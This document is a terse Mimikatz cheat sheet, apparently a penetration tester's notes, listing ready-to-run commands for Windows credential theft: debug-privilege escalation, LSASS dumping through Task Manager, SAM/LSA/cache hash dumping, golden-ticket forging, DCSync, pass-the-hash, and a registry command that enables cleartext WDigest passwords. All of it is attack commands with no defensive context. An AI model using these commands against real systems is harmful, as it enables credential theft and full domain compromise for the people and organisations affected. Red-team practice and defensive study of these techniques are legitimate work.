Mimikatz
Elevate privileges
- privilege::debug
- token::elevate
Show credentials and hashes of recently logged-on users
- sekurlsa::logonpasswords
Dump LSASS via Task Manager
Task Manager > Details > lsass.exe > Right click > Create dump file > lsass.DMP
- sekurlsa::minidump lsass.DMP
- sekurlsa::logonpasswords
Dump hashes
- lsadump::sam
- lsadump::lsa /patch
- lsadump::lsa /inject
- lsadump::cache
- sekurlsa::ekeys
Secrets
- lsadump::secrets
Create a golden ticket on the domain controller
- lsadump::lsa /inject /name:krbtgt
- kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
- misc::cmd
Retrieve the password hashes of user accounts from a domain controller
- lsadump::dcsync /user:<USER> /domain:<DOMAIN.LOCAL>
Pass the hash
- sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd
WDigest - extracting passwords in cleartext
- sekurlsa::wdigest
Enable WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f